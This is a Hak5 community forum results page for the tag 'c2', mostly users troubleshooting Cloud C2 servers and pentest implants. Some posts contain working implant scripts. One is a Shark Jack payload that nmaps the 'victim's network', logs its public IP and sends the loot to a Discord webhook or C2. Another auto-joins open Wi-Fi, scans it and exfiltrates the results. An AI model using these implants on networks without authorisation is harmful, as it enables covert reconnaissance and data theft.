Jump to content

Search the Community

Showing results for tags 'c2'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 23 results

  1. Hi, Novice Nano User. Pineapple Mark VII (on order but not yet arrived), Synology DS-218 NAS. If Ubuntu is a requirement, the Synology Package Center does not list Ubuntu as available for download. Where can I find a tutorial, video, or step by step instructions explaining how to establish C2 on a Synology? Many Thanks, Mongoose
  2. Is there a way to interact with the lan turtle via cobalt strike? If so, how do you set it up/configure?
  3. Cloud C² is running properly on the vps server (previous problem is solved, no more conflict with other application! Great thanks to chrizree.) A Chinese sentence says that a draw is better than 100,000 words… So, you can a picture that shows my network config at https://github.com/th3m1s-42/th3m1s-42/blob/main/img/networkScheme1.png The cloud C2 server is launched by systemd: /etc/systemd/system/cloudc2.service file: root@vps:/etc/systemd/system# cat cloudc2.service [Unit] Description=Hak5 Cloud C2 After=cloudc2.service [Service] Type=idle ExecStart=/usr/local/bin/c2-3.1.2_amd64_linux \ -hostname fullyQualifiedName.tld \ -https \ -keyFile /path/to/keys/myFile.key \ -certFile /path/to/certs/myFile.crt \ -db /path/to/hak5c2/c2.db [Install] WantedBy=multi-user.target root@vps:/etc/systemd/system# I connect my laptop on Internet through the WiFi Pineapple… So I presume that, if my laptop can join an host on the net, my Pineapple device can do it too… I can surf the Internet without problem. I have run 3 tests to ensure that ports 80, 443 and 2022 are enable: In the address field of my favorite browser, I type "fullyQualifiedName.tld:80". The Hack5 Cloud C² login page is displayed in the browser window without using SSL. C² is listening HTTP on port 80. Same thing with "fullyQualifiedName.tld:443", same result with SSL. C² is listening HTTPS on port 443. In a terminal window : myself@MacBook ~ % ssh -p 2022 foobar@fullyQualifiedName.tld The authenticity of host '[fullyQualifiedName.tld]:2022 ([aaa.bbb.ccc.ddd]:2022)' can't be established. RSA key fingerprint is SHA256:sgRolDenN95AzPaxDE6BUY6npK3VTdd2xOfVuZyQL/E. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[fullyQualifiedName.tld]:2022,[aaa.bbb.ccc.ddd]:2022' (RSA) to the list of known hosts. foobar@fullyQualifiedName.tld: Permission denied (publickey). myself@MacBook ~ % C² is listening SSH on port 2022 (even though the foobar user do not exist on this VPS! 😂). So, I think everything is ok to add my pineapple device on Cloud C². I create a device in the Cloud C² admin interface (Add button) with type "WiFi Pineapple NANO / TETRA ». I download the device.config with he Setup button on the newly created device page… I upload this file on Pineapple device: myself@MacBook ~ % scp ~/Downloads/device.config root@172.14.42.1:/etc/ root@172.16.42.1's password: device.config 100% 832 168.3KB/s 00:00 myself@MacBook ~ % I reboot Pineapple device with the admin interface of the Pineapple (http://172.16.42.1:1471/) Unfortunately, the Pineapple stays offline with the status "Last Seen: never". Another test: myself@MacBook ~ % ssh root@172.16.42.1 root@172.16.42.1's password: BusyBox v1.30.1 () built-in shell (ash) ***** WiFiPineapple Banner ***** With OpenWRT 19.07.2 --------------------- root@PineappleTetra:~# ps xaf PID TTY STAT TIME COMMAND 2 ? S 0:00 [kthreadd] 7 ? S 0:00 \_ [ksoftirqd/0] 6 ? I< 0:00 \_ [mm_percpu_wq] 4 ? I< 0:00 \_ [kworker/0:0H] 3 ? I 0:02 \_ [kworker/0:0] 5 ? I 0:01 \_ [kworker/u2:0] 8 ? I 0:01 \_ [kworker/u2:1] 82 ? S 0:00 \_ [oom_reaper] 88 ? I< 0:00 \_ [kblockd] 85 ? S 0:00 \_ [kcompactd0] 83 ? I< 0:00 \_ [writeback] 86 ? I< 0:00 \_ [crypto] 122 ? S 0:00 \_ [kswapd0] 184 ? S 0:00 \_ [spi0] 281 ? I< 0:00 \_ [ipv6_addrconf] 283 ? I< 0:00 \_ [dsa_ordered] 295 ? S 0:00 \_ [ubi_bgt0d] 300 ? I< 0:00 \_ [kworker/0:1H] 361 ? I 0:00 \_ [kworker/0:3] 404 ? S 0:00 \_ [ubifs_bgt0_1] 594 ? I< 0:00 \_ [cfg80211] 632 ? I< 0:00 \_ [rpciod] 633 ? I< 0:00 \_ [xprtiod] 666 ? I< 0:00 \_ [nfsiod] 3906 ? I 0:00 \_ [kworker/u2:2] 1 ? Ss 0:02 /sbin/procd 470 ? S 0:00 /sbin/ubusd 498 ttyS0 Ss+ 0:00 /sbin/askfirst /bin/login 564 ? S 0:01 /sbin/urngd 889 ? S 0:00 /sbin/logd -S 64 1000 ? S 0:00 /sbin/netifd 1243 ? S 0:00 \_ udhcpc -p /var/run/udhcpc-eth0.pid -s /lib/netifd 1052 ? Ss 0:00 /usr/sbin/atd 1497 ? Ss 0:00 php-fpm: master process (/etc/php7-fpm.conf) 1499 ? S 0:01 \_ php-fpm: pool www 1498 ? S 0:01 \_ php-fpm: pool www 1527 ? S 0:00 /usr/sbin/sshd -D 3632 ? Ss 0:00 \_ sshd: root@pts/0 3646 pts/0 Ss 0:00 \_ -ash 4635 pts/0 R+ 0:00 \_ ps xaf 1571 ? S 0:00 nginx: master process /usr/sbin/nginx -c /etc/nginx/n 1611 ? S 0:00 \_ nginx: worker process 1574 ? Ss 0:07 /usr/sbin/hostapd -P /var/run/wifi-phy0.pid -B /var/r 1625 ? S 0:00 /usr/sbin/dnsmasq -C /var/etc/dnsmasq.conf.cfg01411c 1746 ? S< 0:00 /usr/sbin/ntpd -n -N -S /usr/sbin/ntpd-hotplug -p 0.o 1749 ? S 0:00 /bin/sh /etc/rc.common /etc/rc.d/S99cc-client boot 1753 ? S 0:20 \_ cc-client /etc/device.config root@PineappleTetra:~# A cc-client process is running. The Pineapple device should connect to the C² Cloud server… but nothing! I even tried to change the device name to PineappleTertra (hostname of the device, seen during the ssh session, above) in the Cloud C² server and repeat the process of configuration (download device.congig from server, upload it to device and reboot device), to no avail. 🙃 I misunderstand: I think to have done everything like RTFM!! 😢 Has anyone an idea? Where can I look for the solution? Thank you for the help, Best regards. Éd.
  4. I run a VPN service to connect to the Internet. I can open my C2 instance OK and see my devices and stats OK. When I select a device, terminal, and try to open a SSH connection to the device I get the spinning circle icon and never get the SSH session established. Any suggestion on how to keep my VPN session and be able to open a SSH session from withing my C2 instance would be appreciated.
  5. Nmap Quickscan with Discord Integration (Cleaned & C2 Enabled) This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to. The Payload waits for "Internet Connection" to be present. Once Internet Connection is found, It scans the local subnet for any online devices. - While also logging the Public IP of the Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.) payload.sh #!/bin/bash # Title: Nmap Quickscan w/ Discord Integration (Cleaned & C2 Enabled) # Author: REDD of Private-Locker # Version: 1.3 # # This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to. # The Payload waits for "Internet Connection" to be present. Once Internet Connection is found, # It scans the local subnet for any online devices. - While also logging the Public IP of the # Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.) # # Magenta w/ Yellow ........Waiting for Internet # 1st Yellow flashing.......Scanning for Gateway/Subnet # Cyan flashing.............Running Nmap scan on x.0/24 # 2nd Yellow Flashing.......Installing dependencies for Discord Integration # Yellow....................Sent to Discord Webhook # Blue......................Exfiltrating to C2 # Red.......................Failed C2/EXFIL/Scanning # Green.....................Finished # Turn on Discord Integration (Yes = 1, No = 0) DISCORD=0 WEBHOOK='PLACE_DISCORD_WEBHOOK_HERE' # Send Loot as File or Plain Messages (File = 1, Messages = 0) AS_FILE=0 if [ -f "/etc/device.config" ]; then INITIALIZED=1 else INITIALIZED=0 fi LED SETUP NETMODE DHCP_CLIENT while ! ifconfig eth0 | grep "inet addr"; do LED Y SOLID; sleep .2; LED M SOLID; sleep .8; done URL="http://www.example.com" while ! wget $URL -qO /dev/null; do sleep 1; done GET_GATEWAY=$(route -n | grep 'UG[ \t]' | awk '{print $2}') while [ $GET_GATEWAY == "" ]; do sleep 1; done INTERNAL_IP=$(ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p') SUBNET=$(echo "$GET_GATEWAY" | awk -F"." '{print $1"."$2"."$3".0/24"}') CHK_SUB=$(echo $INTERNAL_IP | cut -d"." -f1-3) FIN_SUB="${CHK_SUB}.0/24" LED ATTACK; if [ "$SUBNET" != "$FIN_SUB" ]; then LED R FAST; sleep 2; LED R SOLID; else # Fix for Timestamp Update ntpd -gq; sleep 1; DATE_FORMAT=$(date '+%m-%d-%Y_%H:%M:%S') LOOT_DIR="/root/loot/nmap-diag" LOOT_FILE="$LOOT_DIR/diag-${DATE_FORMAT}.txt" if [ ! -d "$LOOT_DIR" ]; then mkdir -p "$LOOT_DIR" fi if [ ! -f "$LOOT_FILE" ]; then touch "$LOOT_FILE" fi # Get Public IP and run NMAP scan PUBLIC_IP=$(wget -q "http://api.ipify.org" -O -) printf "\n Public IP: ${PUBLIC_IP}\n Online Devices for ${SUBNET}:\n--------------------------------------------\n\n" >> "$LOOT_FILE" LED C VERYFAST run_nmap () { nmap -sn --privileged "$SUBNET" --exclude "$INTERNAL_IP" | awk '/Nmap scan report for/{printf " -> ";printf $5;}/MAC Address:/{print " - "substr($0, index($0,$3)) }' >> "$LOOT_FILE" } run_nmap & PID=$! while kill -0 "$PID" 2>&1 >/dev/null; do wait $PID done if [ -s "$LOOT_FILE" ]; then if [ "$DISCORD" == 1 ]; then CURL_CHK=$(which curl) if [ "$CURL_CHK" != "/usr/bin/curl" ]; then LED Y VERYFAST; opkg update;opkg install libcurl curl; fi LED Y SOLID if [ "$AS_FILE" == 1 ]; then FILE=\"$LOOT_FILE\" curl -s -i -H 'Content-Type: multipart/form-data' -F FILE=@$FILE -F 'payload_json={ "wait": true, "content": "Loot has arrived!", "username": "SharkJack" }' $WEBHOOK fi if [ "$AS_FILE" == 0 ]; then while read -r line; do DISCORD_MSG=\"**$line**\" curl -H "Content-Type: application/json" -X POST -d "{\"content\": $DISCORD_MSG}" $WEBHOOK done < "$LOOT_FILE" fi LED G SOLID;sleep 2; fi if [ "$INITIALIZED" == 1 ]; then LED Y SOLID if [ -z "$(pgrep cc-client)" ]; then C2CONNECT while ! pgrep cc-client; do LED B SOLID;sleep .2;LED G SOLID;sleep .8; done fi # Re-issuing C2CONNECT to verify loot push to C2 C2CONNECT sleep 2 C2EXFIL STRING "${LOOT_FILE}" "Nmap Diagnostic for Network ${SUBNET}" LED M VERYFAST; sleep 2; fi LED FINISH; else LED R SOLID; rm -rf "$LOOT_FILE"; fi fi
  6. How do I upgrade my cloud server? I bought the pro lisence but there is no place to add it and when I try to upgrade I just get redirected to purchase it again?? any help is appreciated.
  7. denisit

    C2 ipV6

    Hello, I try to set up a C2 server on a RPI 3 but I get a problem. I want just use it in a LAN. I run the command below : ./c2_community-linux-armv5 -hostname RPI_IP But I cannot access to the web interface. When I check the listen port with netstat I see the C2 server listen on tcp6, not on tcp : tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN tcp6 0 0 :::8080 :::* LISTEN tcp6 0 0 :::22 :::* LISTEN tcp6 0 0 :::2022 :::* LISTEN tcp6 0 0 :::6600 :::* LISTEN thanks.
  8. Hey Fam! I just set up my c2 cloud server on a digitalocean VPS w/ https, domain name and everything with no issues. I also set up my wifi pineapple to reconnect to the c2 web server when it connects to the interwebz. I cannot, however, seem to get the recon module working in the c2 web interface. It just keeps loading and saying there is no recon info yet. I let it run for a good 30-40 minutes before deciding something was wrong. Is this a bug or something on my end? Any help would be greatly appreciated. Much love to Hak5, Ramp115
  9. Hi, We're happy to announce the 2.2.x release of the Cloud C2, which features a new notifications system and support for the new Hak5 Key Croc! Change Log (2.2.0) Hak5 Key Croc Added support for the Hak5 Key Croc! Hak5's Key Croc is a Keylogger armed with pentest tools, remote access and payloads that trigger multi-vector attacks when chosen keywords are typed. Live keystrokes, typed history and keystroke injection can be performed remotely with ease. Notifications Notifications can now be sent from enrolled devices. Notifications can be managed from the new bell icon in the status bar of the Cloud C2. You can download the latest version over-the-air in your existing Cloud C2 instance on Linux or Mac, or visit the Hak5 Download Center to grab the release for all supported devices and operating systems. As always, thank you for the support and great community feedback!
  10. Hello Everyone, When this guide was first launched I was about mid-way through my studies in Networking and Systems Administration, and since I've learned a lot since then I decided to completely rework this guide (04/05/2020). I want to provide everyone with a guide that will not only get you up and running, but will also provide you with a stable environment as well. Please remember that I am NOT responsible for your actions, and you should never perform nor condone any illegal activities. Notes: This installation guide is written ONLY for Ubuntu 18.04/20.04 LTS. Step 1. Update, upgrade, and clean your machine. sudo apt -y update && sudo apt -y upgrade && sudo apt clean Step 2. Install required packages. sudo apt -y install unzip ufw Step 3. Open ports depending on your needs (20, 2022, 80, 8080, 443). sudo ufw allow 22,2022,80,8080,443/tcp && sudo ufw enable && sudo ufw reload Step 4. Download and unzip the community ZIP files in the tmp directory. sudo wget https://c2.hak5.org/download/community -O /tmp/community && sudo unzip /tmp/community -d /tmp Step 5. Move the c2_community* file to usr/local/bin, and create the require database directory. sudo mv /tmp/c2_community-linux-64 /usr/local/bin && sudo mkdir /var/hak5c2 Step 6. Create a new systemd service to run the Hak5 C2 script. sudo vim /etc/systemd/system/hak5.service Step 7. Utilize a template below, or build your own. Template A (https) [Unit] Description=Hak5 C2 After=hak5.service [Service] Type=idle ExecStart=/usr/local/bin/c2_community-linux-64 -hostname IPAddressORHostname -https -db /var/hak5c2/c2.db [Install] WantedBy=multi-user.target Template B (http) [Unit] Description=Hak5 C2 After=hak5.service [Service] Type=idle ExecStart=/usr/local/bin/c2_community-linux-64 -hostname IPAddressORHostname -db /var/hak5c2/c2.db [Install] WantedBy=multi-user.target Template C (http / port 80) [Unit] Description=Hak5 C2 After=hak5.service [Service] Type=idle ExecStart=/usr/local/bin/c2_community-linux-64 -hostname IPAddressORHostname -listenport 80 -db /var/hak5c2/c2.db [Install] WantedBy=multi-user.target Step 8. Reload the systemd daemon, enable the service, and start. sudo systemctl daemon-reload && sudo systemctl enable hak5.service && sudo systemctl start hak5.service Step 9. View the status of your service in order to view your key. sudo systemctl status hak5.service Step 10. Visit your website and fill in the required information to finalize. Step 11. Sign into your Hak5 C2 website. Step 12. Add devices, export logs, and more! Woot!
  11. ok, so I'm new to this, but if I want to combine a couple of the payloads that's available at hak5 GitHub, can I for example make one payload that has wifi connect payload and the open ap Nmap my thought was to copy the payloads into a single payload and make the individual payload a function! Any tips or tricks would be nice! My goal is that if it connects to a specific network when it boots up, it will dump the loot to C2, but if it doesn't connect, it will automatically start the Open AP Nmap Scan this is what I have so far: ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- #!/bin/bash # This is a test to see if my network is in range, it will connect home and export the loot to C2 # if my network is out of range or can't connect to it, it will do the Open AP Attack! # Title: Simple WiFi Connection Example # Author: Hak5Darren # Version: 1.0 function Home() { # WiFi Client Setup WIFI_SSID="SSID" WIFI_PASS="Password" LED SETUP WIFI_CONNECT # optionally start SSH server # /etc/init.d/sshd start LED ATTACK C2CONNECT && C2EXFIL } function OpenAP() { # Title: Open AP Nmap Scanner # Author: Hak5Darren # Version: 1.0 # # Description: Scans for open access points, then connects to each and runs an Nmap scan saving logs to the loot folder # # LED SETUP: Scanning # LED ATTACK: Connected, running nmap scan # # See nmap --help for options. Default "-sP" ping scans the address space for fast host discovery. NMAP_OPTIONS="-sP" LOOT_DIR=/root/loot/open_ap_nmap_scan MAX_CIDR=20 DEBUG=1 function scan_wifi() { [[ $DEBUG == 1 ]] && echo Scanning for open access points | tee -a /tmp/payload.log iwlist wlan0 scan > /tmp/wifi_scan cat /tmp/wifi_scan | grep "Encryption key:off" -A1 | grep ESSID | sort | uniq | cut -c 28- | sed "s/.$//g" > /tmp/open total_aps=$(cat /tmp/open | wc -l) [[ $DEBUG == 1 ]] && echo Found "$total_aps" open access points | tee -a /tmp/payload.log } function check_ap() { current_ap=$(sed -n "$on"p /tmp/open) [[ $DEBUG == 1 ]] && echo "-------------------------------" | tee -a /tmp/payload.log current_ap_mac=$(cat /tmp/wifi_scan | grep "$current_ap" -B5 | grep Address | awk {'print $5'} | head -1) [[ $DEBUG == 1 ]] && echo Selected AP MAC: "$current_ap_mac" | tee -a /tmp/payload.log if grep -i -q "$current_ap_mac" /tmp/nmap_scanned; then [[ $DEBUG == 1 ]] && echo Skipping - Already scanned AP: "$current_ap" with MAC: "$current_ap_mac" | tee -a /tmp/payload.log else connect_wifi scan_network fi } function connect_wifi() { LED STAGE1 [[ $DEBUG == 1 ]] && echo Connecting to Open WiFi AP: "$current_ap" | tee -a /tmp/payload.log ifconfig wlan0 down iwconfig wlan0 mode Managed essid "$current_ap" ifconfig wlan0 up while(iwconfig wlan0 | grep Not-Associated); do sleep 1; done [[ $DEBUG == 1 ]] && echo "Connected to AP number $on with SSID $current_ap" | tee -a /tmp/payload.log udhcpc -i wlan0 while [ -z "$SUBNET" ]; do sleep 1 && find_subnet done APMAC=$(iw wlan0 link | grep Connected | awk {print'$3'}) [[ $DEBUG == 1 ]] && echo "AP MAC Address/BSSID: $APMAC" | tee -a /tmp/payload.log [[ $DEBUG == 1 ]] && iwconfig wlan0 | grep ESSID | tee -a /tmp/payload.log [[ $DEBUG == 1 ]] && ifconfig wlan0 | grep inet | tee -a /tmp/payload.log } function scan_network() { LED STAGE2 find_subnet [[ $DEBUG == 1 ]] && echo "Found Subnet: $SUBNET" | tee -a /tmp/payload.log CIDR=$(echo $SUBNET | cut -d '/' -f 2) [[ $DEBUG == 1 ]] && echo "CIDR: $CIDR" | tee -a /tmp/payload.log if [ "$CIDR" -ge "$MAX_CIDR" ] then [[ $DEBUG == 1 ]] && echo "Starting network scan" | tee -a /tmp/payload.log nmap $NMAP_OPTIONS $SUBNET -oN "$LOOT_DIR/$current_ap-$APMAC.txt" &>/dev/null else [[ $DEBUG == 1 ]] && echo "Network too large - skipping scan" | tee -a /tmp/payload.log fi echo $APMAC >> /tmp/nmap_scanned } function find_subnet() { SUBNET=$(ip addr | grep -i wlan0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//') [[ $DEBUG == 1 ]] && echo "Found subet for network $current_ap as $SUBNET" | tee -a /tmp/payload.log } function run() { while true; do setup scan_wifi while [ "$on" -le "$total_aps" ] do if [ "$on" -ge 1 ]; then check_ap; fi let on=on+1 done sleep 5 [[ $DEBUG == 1 ]] && echo Completed recon. Restarting... | tee -a /tmp/payload.log done } function setup() { LED SETUP mkdir -p $LOOT_DIR touch /tmp/nmap_scanned on=0 killall wpa_supplicant } # Run payload run } Home && poweroff || OpenAP
  12. Hello. I just downloaded cloud c2 and was setting up the server. I closed down the cmd-windows and when I launched the .exe again, the token wouldn't show. Any ideas how to get the token again? Thanks.
  13. Hey guys, I have a packet squirrel setup in Cloud2 and I can successfully start a terminal session. In a terminal session I would like to run a packet capture. If I run the command tcpdump -nni eth1 -f /mnt/loot/tcpdump/test2.pcap I am able to capture some packets. I can Exfil the packet capture with the command: C2EXFIL /mnt/loot/tcpdump/test2.pcap and the file shows up in the C2 dashboard. However, when I download the pcap, Wireshark cannot open it. I get an error message: "The file test2.pcap isn't a capture file in a format that Wireshark understands" Screenshot: https://imgur.com/a/t9MJtoZ I can open the pcap file with Wireshark from the USB stick, if I remove it from the Packet Squirrel and plug it into my PC. Could the C2EXFIL command be modifying the .pcap file when it moves it? I've used the C2EXFIL command to move other files like .txt and .nmap and have not had any issues. Has anyone else experienced this or figured out a way to move pcap's using C2EXFIL?
  14. Hey guys! Been setting up my devices in prep for a up and coming pen test. I can connect my devices to C2 and I came across 2 issues. The first one is about seeing any Loot for the Lan Turtle in C2. I can see Loot for other devices and I know that the Lan Turtle doesn't work exactly the same way as say the Shark Jack in regards to gathering loot. But I was wondering if someone got a method of getting a specific folder shared to the C2 Loot section for the Lan Turtle. Thoughts?
  15. Heya! So, been setting up my devices in C2. Got all of them in there and I can see the Loot as well as other items like say the Pineapple Tetra's SSIDs and such. One thing I can't seem to do is SSH from C2 to any device. I was wondering if I'm missing something specific on my setup. I have even tried setting SNATs to the devices, though I knew that wouldn't have been a requirement nor really worked... But I went that far as I just couldn't figure it out. It would really help me if I can get this sorted as I have a Pen Test coming up and I'm foreseeing the need to drop some of the devices on site. A work around is dropping a Raspberry Pi or something with them, but it does add an additional device. Thoughts?
  16. I have a question can the c2 platform allow for instance, you've got pasword or other hashes and send them to gpu on the c2 server to break them, or some other cpu/gpu grunt work I should be able to do it using a shell on the vmserver passing 2 k2 grids nvidia cards to it in an ESXi based machine ( Thanks Matt circa 2009) can this be done just using c2 interface etc can it be added ??
  17. I have a new install of Cloud C2 and a WiFi Pineapple. I've just been tweaking the configuration, etc. when I noticed that the Pineapple shows offline in the C2 server after about 15 minutes (the exact time varies, sometimes it can be longer). Each time it happens, all indications is that the Pineapple is continuing to function fine. I can log it via web or SSH, stop and start PineAP, make configuration changes, etc. The Pineapple can ping the C2 server by name. If I reboot the Pineapple it reconnects to the C2 server, but that's the only way I can figure out to get it to reconnect. Obviously this is less than ideal. I've tried searching the forums and Google for any similar problem and can't find anything similar. I'm also having an issue with the Recon function on C2 working at all, but I posted about that one separately as others have reported that one. Any help or hint at what could be wrong would be greatly appreciated. I'm running Cloud C2 v2.1.2 Pro Edition on Windows Server 2016 build 1607 and WiFi Pineapple TETRA with firmware v2.7.0. WiFi Pineapple is using eth0 cabled to the LAN and connects to the C2 server over a stable private LAN with less than 2ms latency. I'm running everything on my internal LAN for right now, just to test. I've got PineAP running constantly, almost no modules installed (none of them are active anyway). Here's what the my C2 looks like when the Pineapple disconnects: There is nothing interesting in the Pineapple itself by watching logread. Here are my relevant Cloud C2 logs: 2020-04-28 12:28:07 Device 'Test Wifi Pineapple' has gone offline 2020-04-28 12:03:06 Device 'Test Wifi Pineapple' has started up 2020-04-28 11:28:49 Device 'Test Wifi Pineapple' has gone offline 2020-04-28 10:46:39 Device 'Test Wifi Pineapple' has started up 2020-04-28 09:42:04 Device 'Test Wifi Pineapple' has gone offline 2020-04-28 09:25:10 Device 'Test Wifi Pineapple' has started up 2020-04-27 17:01:00 Device 'Test Wifi Pineapple' has gone offline 2020-04-27 16:32:58 Device 'Test Wifi Pineapple' has started up
  18. SharkHelper This Tool completes the Hak5 "SharkJack.sh" script. This adds small features that the original Helper Script is missing - While also making it easier to setup/re-setup the SharkJack itself. Linux version to be released soon. Any features or requests are welcome. The Menu: O=====================================O | | | SharkHelper Menu | | | O=====================================O 1. Install SharkLib 2. Remove SharkLib 3. Install Default Nmap Scan 4. Install Internet Tester 5. Install Internet Tester C2 6. View Current Payload 7. Install C2 Config File (device.config) 0. Exit SharkHelper Select # from Menu and Press ENTER: The Code: @echo off REM REM Name: SharkHelper (Windows 10) REM Version: 1.2 REM Author: REDD of PL REM Target OS: Windows 10 REM Description: This script is to help make setting up the SharkJack EVEN easier REM than Hak5's Script. I don't know how much easier it can get. REM SET "SHARK_IP=172.16.24.1" cls echo Please put SharkJack into Arming Mode and echo connect it to the Ethernet Port on your PC. echo. echo. echo Waiting.. echo. :loop ping -n 1 %SHARK_IP% |find "TTL=" >NUL 2>NUL || goto :loop echo Connected. timeout /t 2 /NOBREAK >NUL :SHARKHELPER_MENU cls echo. echo. echo O=====================================O echo ^| ^| echo ^| SharkHelper Menu ^| echo ^| ^| echo O=====================================O echo. echo 1. Install SharkLib echo 2. Remove SharkLib echo 3. Install Default Nmap Scan echo 4. Install Internet Tester echo 5. Install Internet Tester C2 echo. echo 6. View Current Payload echo. echo 7. Install C2 Config File (device.config) echo. echo 0. Exit SharkHelper echo. echo. SET /P MENU1=Select # from Menu and Press ENTER: IF "%MENU1%"=="1" GOTO INSTALL_SHARKLIB IF "%MENU1%"=="2" GOTO REMOVE_SHARKLIB IF "%MENU1%"=="3" GOTO DEFAULT_NMAP IF "%MENU1%"=="4" GOTO INSTALL_INTERNET_TESTER IF "%MENU1%"=="5" GOTO INSTALL_C2_INTERNET_TESTER IF "%MENU1%"=="6" GOTO VIEW_PAYLOAD IF "%MENU1%"=="7" GOTO INSTALL_C2_CONFIG IF /I "%MENU1%"=="q" GOTO EOF IF /I "%MENU1%"=="e" GOTO EOF IF /I "%MENU1%"=="quit" GOTO EOF IF /I "%MENU1%"=="exit" GOTO EOF IF /I "%MENU1%"=="0" GOTO EOF GOTO SHARKHELPER_MENU :INSTALL_SHARKLIB cls IF NOT EXIST "%CD%\sharklib.sh" ( echo Downloading SharkLib to local folder. powershell -Command "(New-Object Net.WebClient).DownloadFile('https://git.private-locker.com/project/sharklib/raw/master/sharklib.sh', 'sharklib.sh')" ) IF EXIST "%CD%\sharklib.sh" ( echo SharkLib already exists in current directory. Using that copy. ) echo. echo. echo Pushing sharklib.sh to SharkJack at %SHARK_IP% echo Connecting to the SharkJack.. echo. echo (Input password: hak5shark OR Password you have already set.) scp %CD%\sharklib.sh root@%SHARK_IP%:/root/sharklib.sh echo. echo. echo Executing SharkLib, Exit SharkLib to return to this Menu. echo. ssh root@%SHARK_IP% "chmod +x sharklib.sh;bash /root/sharklib.sh --install;exit" echo. echo Finished. Returning to SharkHelper Menu. pause GOTO SHARKHELPER_MENU :REMOVE_SHARKLIB cls echo. echo. echo Attempting to remove SharkLib from the SharkJack. echo Connecting to the SharkJack.. echo. echo. echo (Input password: hak5shark OR Password you have already set.) ssh root@%SHARK_IP% "sharklib --remove;exit" echo. echo Finished. Returning to SharkHelper Menu. pause GOTO SHARKHELPER_MENU :DEFAULT_NMAP cls IF NOT EXIST "%CD%\payload_default.sh" ( echo Downloading SharkLib to local folder. powershell -Command "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/hak5/sharkjack-payloads/master/payloads/library/recon/Sample-Nmap-Payload/payload.sh', 'payload_default.sh')" ) IF EXIST "%CD%\payload_default.sh" ( echo SharkLib already exists in current directory. Using that copy. ) echo. echo. echo Pushing payload_default.sh to SharkJack at %SHARK_IP% echo Connecting to the SharkJack.. echo. echo (Input password: hak5shark OR Password you have already set.) scp %CD%\payload_default.sh root@%SHARK_IP%:/root/payload/payload.sh echo. echo Finished. Returning to SharkHelper Menu. pause GOTO SHARKHELPER_MENU :INSTALL_INTERNET_TESTER cls IF NOT EXIST "%CD%\payload_Internet_Tester.sh" ( echo Downloading Internet Tester to local folder. powershell -Command "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/hak5/sharkjack-payloads/master/payloads/library/util/internet-access-tester/payload.sh', 'payload_Internet_Tester.sh')" ) IF EXIST "%CD%\payload_Internet_Tester.sh" ( echo Internet Tester Payload already exists in current directory. Using that copy. ) echo. echo. echo Pushing payload_Internet_Tester.sh to SharkJack at %SHARK_IP% echo Connecting to the SharkJack.. echo. echo (Input password: hak5shark OR Password you have already set.) scp %CD%\payload_Internet_Tester.sh root@%SHARK_IP%:/root/payload/payload.sh echo. echo Finished. Returning to SharkHelper Menu. pause GOTO SHARKHELPER_MENU :INSTALL_C2_INTERNET_TESTER cls IF NOT EXIST "%CD%\payload_C2_Internet_Tester.sh" ( echo Downloading Internet Tester to local folder. powershell -Command "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/hak5/sharkjack-payloads/master/payloads/library/util/internet-access-tester/payload.sh', 'payload_C2_Internet_Tester.sh')" echo C2CONNECT >> %CD%\payload_C2_Internet_Tester.sh ) IF EXIST "%CD%\payload_C2_Internet_Tester.sh" ( echo Internet Tester Payload already exists in current directory. Using that copy. ) echo. echo. echo Pushing payload_Internet_Tester.sh to SharkJack at %SHARK_IP% echo Connecting to the SharkJack.. echo. echo (Input password: hak5shark OR Password you have already set.) scp %CD%\payload_C2_Internet_Tester.sh root@%SHARK_IP%:/root/payload/payload.sh echo. echo Finished. Returning to SharkHelper Menu. pause GOTO SHARKHELPER_MENU :INSTALL_C2_CONFIG cls IF NOT EXIST "%CD%\device.config" ( echo. echo Please make sure to put your 'device.config' file in: echo -^> %CD% echo. echo. pause GOTO SHARKHELPER_MENU ) IF EXIST "%CD%\device.config" ( echo. echo Continuing.. device.config file found. echo. echo. echo Pushing device.config to SharkJack at %SHARK_IP% echo Connecting to the SharkJack.. echo. echo (Input password: hak5shark OR Password you have already set.) scp %CD%\device.config root@%SHARK_IP%:/etc/device.config echo. echo Finished. Returning to SharkHelper Menu. pause GOTO SHARKHELPER_MENU ) :VIEW_PAYLOAD cls echo Connecting to the SharkJack with default credentials. (root:hak5shark) echo. echo. echo (Input password: hak5shark OR Password you have already set.) echo. ssh root@%SHARK_IP% "cat /root/payload/payload.sh;exit" echo. pause GOTO SHARKHELPER_MENU :EOF echo Cleaning Up.. IF EXIST "%CD%\payload_C2_Internet_Tester.sh" del /f 